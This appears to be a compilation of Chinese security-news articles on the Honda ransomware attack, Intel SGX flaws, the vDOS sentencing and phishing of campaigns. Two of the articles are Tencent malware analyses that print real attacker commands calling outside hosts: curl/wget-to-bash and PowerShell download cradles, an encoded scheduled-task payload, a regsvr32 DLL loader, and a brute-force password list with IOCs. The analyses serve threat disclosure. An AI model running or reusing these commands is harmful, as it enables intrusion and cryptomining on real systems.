据外媒报道，本周初发生在本田的网络攻击迫使这家日本汽车制造商关闭了其位于美国俄亥俄州和土耳其的一些汽车厂以及印度和南美的一些摩托车工厂。此次攻击发生在北美工厂重新开放不到一个月后，这些工厂此前因新冠疫情而已将工作地点改为在家办公。 现在，本田公司发言人宣布，受到攻击的工厂已经恢复生产。巴西和印度的工厂已于周三恢复生产。但发言人指出，公司的一些北美在线金融服务和呼叫中心将继续停止服务。但在俄亥俄州的主要工厂的汽车产量工作已于周四恢复正常。 据悉，周一的网络攻击是本田全球网络遭遇到的第二次攻击，第一次则是在三年前席卷全球的WannaCry网络攻击。 值得庆幸的是，在这次攻击中，客户的个人信息没有被泄露，本田发言人对此作出了 澄清，然而遗憾的是他并未对因产量下降而造成的损失发表任何评论。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限，可直接攻击SMB服务造成RCE（远程代码执行），存在漏洞的计算机只要联网就可能被黑客探测攻击，并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示，至今仍有近三分之一的系统未修补该漏洞，我们再次强烈建议所有用户尽快修补SMBGhost漏洞（CVE-2020-0796）。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击，在失陷系统创建定时任务并植入挖矿木马功能，使得其攻击的范围继续扩大，包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马，并会按照惯例在开始挖矿前，清除其他挖矿木马，以便独占系统资源。挖矿活动会大量消耗企业服务器资源，使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测，针对Linux系统root用户，尝试利用弱密码进行爆破连接，爆破使用密码字典： “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令： `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测，在函数redisexec中尝试连接未设置密码的redis服务器，访问成功后执行远程命令： `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png，该脚本主要有以下功能： a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马： 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP，重新与该机器建立连接进行内网扩散攻击： 创建目录/.Xll并下载挖矿木马（d[.]ackng.com/ln/xr.zip）到该目录下，解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态，目前该木马会通过以下方法进行扩散传播： 截止2020年6月12日，永恒之蓝木马下载器家族主要版本更新列表如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

正在英特尔努力消除多个处理器漏洞造成的负面影响的时候，三所大学的安全研究人员再次无情地曝光了 SGX 软件防护扩展指令的另外两个缺陷。对于攻击者来说，这可以让他们相当轻松地提取敏感数据。庆幸的是，新问题可通过积极的补救措施得到修复，且当前尚无新漏洞已在野外被利用的相关证据。 来自美国密歇根、荷兰阿姆斯特丹、以及澳大利亚阿德莱德三所大学的研究人员披露 —— 攻击者可利用多核体系架构的工作方式，来获得对受感染系统上敏感数据的访问权限。 其已经为两个漏洞开发了对应的攻击方法，并给出了 SGAxe 和 CrossTalk 的概念证明。 前者似乎是今年早些时候曝光的 CacheOut 攻击的高级版本，黑客可从 CPU 的 L1 缓存中提取内容。 研究人员解释称，SGAxe 是英特尔减轻针对软件防护扩展（SGX）的旁路攻击的一个失败尝试。作为 CPU 上的一个专属区域，SGX 原意是确保正在处理的代码和数据的完整与机密性。 借助瞬态执行攻击，黑客可从实质上恢复存储在 SGX 区域中的加密密钥，并将之用于解密长存储区，以获得机器的 EPID 密钥。后者被用于确保事务的安全性，比如金融交易和受 DRM 保护的内容。 至于第二个 CrossTalk 漏洞，其属于微体系架构数据采样（MDS）的一个衍生，能够针对 CPU 的行填充缓冲区（LBF）处理的数据发起攻击。 其原本希望提供 CPU 内核访问的“登台缓冲区”，但黑客却能够利用在一个单独核心上运行的特制软件，来破坏保护其运行的软件代码和数据私钥。 据悉，新漏洞影响 2015 ~ 2019 年发布的多款英特尔处理器，包括部分至强 E3 SKU（E5 和 E7 系列已被证明可抵御此类新型攻击）。 英特尔在 6 月份的安全公告中称，只有极少数的人能够在实验室环境中发起这些攻击，目前尚无漏洞在野外被利用的报告。 即便如此，该公司仍将尽快发布微码更新，同时让之前签发的证明密钥失效。     （稿源：cnBeta，封面源自网络。）

据Motherboard周三的一份报告称，为了揭露一名在Facebook上反复骚扰和剥削女孩的加州男子，该社交网络决定帮助FBI对其进行黑客攻击。据报道，Facebook多年来一直在跟踪Buster Hernandez。据Motherboard报道称，通过安全操作系统Tails，Hernandez得以隐藏他的真实IP地址并继续在Facebook上联系和骚扰数十名受害者。 为此，Facebook的安全团队最终决定跟第三方公司合作开发一套黑客工具以此来利用Tails视频播放器的漏洞。据报道，Facebook为此支付了六位数的费用，该漏洞可以显示观看视频的人的真实IP地址。据了解，该工具被交给了一位中间人，后者则将其移交给了FBI。该报道还称，目前还不清楚FBI是否知道Facebook参与其中。 据Motherboard称，FBI跟一名受害者合作利用该工具向Hernandez发送了一段设置陷阱的视频从而收集了能对其进行逮捕并定罪的证据。今年2月，Hernandez承认了41项指控，其中包括制作儿童色情作品、威胁杀人、绑架和伤害。 Facebook证实了他们有跟安全专家合作来为FBI提供帮助。 Motherboard指出，其通过跟几名Facebook现任和前任员工经过交谈了解到，这是该公司首次也是唯一一次以这种特定方式帮助执法部门追缉罪犯。     （稿源：cnBeta，封面源自网络。）

信息窃取软件是常见的恶意软件之一。 如：多平台远程管理工具（RAT)Netwire (MITRE S0198)从2012年开始被网络犯罪组织不断使用。在我们进行网络监测期间，发现了一个特定的Office文档，该文档通过安装恶意软件插件，来对意大利人民发起隐藏性的网络攻击活动，这种攻击活动的特定供给链采取了独特的技术模式，类似于这种，本文将对此进行深入分析。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1238/     消息来源：yoroi， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

据外媒报道，本田的全球业务受到了勒索软件攻击，这家日本汽车制造商仍在努力让一切恢复正常。该家公司于当地时间周二表示，它将不得不暂时关闭部分生产设施，另外客户和金融服务业务也已经被关闭。本田在向The Verge发表的一份声明中说道：“目前没有证据表明个人身份信息丢失。我们大多数工厂都已恢复生产，目前正在努力恢复我们在俄亥俄州的汽车和发动机工厂的生产工作。” 据了解，本田遭到的网络攻击所使用的是被认为是被叫做Snake的勒索软件。通过它，黑客可以对遭到攻击的公司的文件进行加密将其作为勒索筹码。根据The Verge网站看到的一条信息显示，本田在其内部警报系统中将其称为“重大电脑勒索软件病毒攻击”。“来自全球和跨NA地区的IT团队正在持续工作以遏制这次攻击（带来的影响），另外还在尽快恢复正常的业务操作，但许多依赖于信息系统的业务流程仍受到了影响。” 据Twitter上的投诉显示，虽然本田表示一些工厂正在重新开工，但业主无法进行在线支付或进入公司的客户服务网站。该公司北美最大的客户和金融服务办公室的一名员工告诉The Verge，临时员工在办公室关闭时是没有工资的。 即使系统已经备份，本田美国客户和金融服务办公室的许多员工也无法远程工作。正如The Verge在5月份报道的那样，这意味着在大流行期间，许多员工不得不去办公室，对此一些员工担心公司在阻止新冠病毒传播方面做得不够。不过在过去几周，这些办公室的员工告诉The Verge，本田终于开始实行体温检测、加强社交距离，并且在某些地区地方允许更多的人远程工作。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播，通过计划任务、WMI后门进行本地持久化，然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS（Handshake），还会利用regsvr32.exe加载执行DLL形式的木马程序，匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行，试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载，此次变种攻陷了某旅游文化网站并将其作为木马下载服务器，其使用过的公共网址如下： upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站（新） 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload（x86.dll或x64.dll）, Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在，若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下： schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA=" 该命令安装名为“VNware ”的计划任务，每隔80分钟执行一次另一段经过base64编码的Powershell命令，同样，解码后内容如下： IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt')) 然后计划任务从http[:]//mywebsaat.xyz/vip.txt下载vip.txt反复运行，并完成以下功能： 1、访问统计页面，记录攻击次数 2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码： IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg')) 3、通过注册表修改操作，关闭Windows Defender，同时开启WDigest缓存（可以从内存缓存中窃密用户名和登陆密码）。 在执行该步骤前，脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png，并保存为C:\ProgramData\Defender.txt，通过判断该文件是否存在，来确认这个步骤是否执行过。 4、安装WMI后门（事件过滤器“fuckamm3”、事件消费者“fuckamm4”）持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’))，而“fuckamm3”、“fuckamm4”是Mykings挖矿僵尸网络团伙使用的WMI后门名称，推测“匿影”挖矿木马团伙与Mykings挖矿僵尸网络可能有一定的关联。 5、下载和启动挖矿程序，脚本会从多个地址下载不同的挖矿程序，存放在不同的路径下，具体样本如下： C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner （https://github.com/NebuTech/NBMiner/releases），支持NVIDIA、AMD显卡，支持GRIN、AE、CKB、SERO、SIPC、BTM、ETH、SWAP等币种的挖矿。 其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器： WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行，然后通过该DLL启动挖矿木马。 new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll') `Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'` 完成挖矿木马启动和持久化过程后，继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg，启动下一轮攻击： IOCs Domain mywebsaat.xyz rss.mywebsaat.xyz URL https[:]//www.upload.ee/files/11799957/1.txt.html https[:]//www.upload.ee/files/11814903/1.txt.html https[:]//www.upload.ee/files/11815494/1.txt.html https[:]//www.upload.ee/files/11816420/1.txt.html https[:]//www.upload.ee/files/11816445/1.txt.html https[:]//www.upload.ee/files/11822214/1.txt.html http[:]//mywebsaat.xyz/999.jpg https[:]//mywebsaat.xyz/xmr.jpg http[:]//mywebsaat.xyz/nb.jpg http[:]//mywebsaat.xyz/yh.jpg http[:]//mywebsaat.xyzc.jpg http[:]//mywebsaat.xyz/fxtxt.jpg http[:]//mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/xmr.jpg http[:]//rss.mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/nb.jpg http[:]//rss.mywebsaat.xyz/yh.jpg http[:]//rss.mywebsaat.xyzc.jpg http[:]//rss.mywebsaat.xyz/fxtxt.jpg https[:]//mywebsaat.xyz/cccdll.jpg http[:]//mywebsaat.xyz/kp.txt https[:]//mywebsaat.xyz/123.jpg http[:]//www.worldyou.top/images/xmr.jpg http[:]//www.worldyou.top/images/tsakhost.jpg http[:]//www.worldyou.top/images/999.jpg http[:]//www.worldyou.top/images/btc.jpg http[:]//www.worldyou.top/images/fxtxt.jpg http[:]//www.worldyou.top/images/nb.jpg http[:]//www.worldyou.top/images/sd.jpg http[:]//www.worldyou.top/images/yh.jpg MD5 33110e53078ed5a0cf440d182878f30b 441a61cdd30502b3fcca03c28ccb49e8 5e20062b94f38e447be60f9f2b0286cd ee5d5f0e0fe7db7186f72d3d5256b1be f4fbfb10c441974ef5b892a35b08e6eb 85f25f9264664111f7df6dc76320b90b

5月29日，我们发现了一起网络攻击事件，我们认为这该事件是由一名叫做Higaisa的渗透攻击黑客发起的。有关信息显示：Higaisa APT与朝鲜半岛有关，并于2019年初被腾讯安全威胁情报中心进行了首次披露。 该小组的活动可以追溯到2016年，活动内容包括使用特洛伊木马（例如Gh0st和PlugX）以及移动恶意软件，活动目标包括政府官员、人权组织以及与朝鲜有关的其他实体企业。 在近期的攻击活动中，Higaisa使用了一个恶意快捷文件，该文件最终导致了一个包含恶意脚本、有效载荷和欺诈PDF文档内容的多阶段攻击行为。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1235/     消息来源：malwarebytes， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

DDoS 租用服务 vDOS 目前已经停止运行，在过去四年中帮助付费客户发起了超过 200 万次分布式拒绝服务（DDoS）攻击，让无数互联网用户和网站陷入离线状态。近日该服务的联合创始人 Yarden Bidani 和 Itay Huri 被以色列法院判处六个月的社区服务。 在 FBI 对 vDOS 服务深入调查之后，锁定了犯罪嫌疑人 Yarden Bidani 和 Itay Huri，两人均为以色列公民，在 2016 年被捕的时候年仅 18 岁。 在 2016 年服务关闭之前，vDOS 是业内最可靠、最强大的 DDoS 租用或者“booter”服务，即使是完全不熟练的互联网用户也能付费发起击垮大多数网站的瘫痪攻击。 在广告宣传中，vDOS 宣称能够以每秒50千兆比特的数据（Gbps）发起攻击。对于那些没有使用昂贵的反DDoS保护服务网站，这足以使其瘫痪。 在这份以希伯来语撰写的量刑备忘录（PDF）中，尽管已经对两名被告使用了化名，但依然能从文件的诸多线索中确定被告的身份。例如，两名被告在运营 vDOS 服务期间非法所得超过60万美元。     （稿源：cnBeta，封面源自网络。）

路透社报道称，境外黑客正在对美总统候选人的电子邮件展开攻击，现任总统唐纳德·特朗普和民主党主要候选人乔·拜登的个人电子邮件账户都受到了威胁。分析称某些具有资深背景的黑客试图将拜登竞选团队的工作人员作为攻击目标，另有所谓的伊朗黑客将目光瞄向了特朗普竞选团队工作人员的电子邮件账户。 谷歌威胁分析团队负责人 Shane Huntley 在一条推文中称，黑客已对美总统竞选人开展了网络钓鱼尝试，且丝毫没有就此收手的迹象。 谷歌发言人亦在接受 TheVerge 采访时称，该公司尚未见到有证据表明任何攻击攻击已经得逞，因此未将相关信息转交给联邦执法人员。 即便如此，谷歌仍鼓励竞选团队成员为其工作和个人电子邮件账户加以额外的防护，比如两步验证和谷歌提供的高级安全防护等资源。 拜登竞选团队的新闻事务部长 Matt Hill 表示，他们已经意识到了网络钓鱼的企图，竞选团队将保持警惕，并且为应对此事做好了网络安全相关的准备。 特朗普竞选团队发言人亦表示，其已被告知境外黑客未能攻破其部署的安全防线，同样对网络安全保持警惕，但未进一步谈论任何预防措施。     （稿源：cnBeta，封面源自网络。）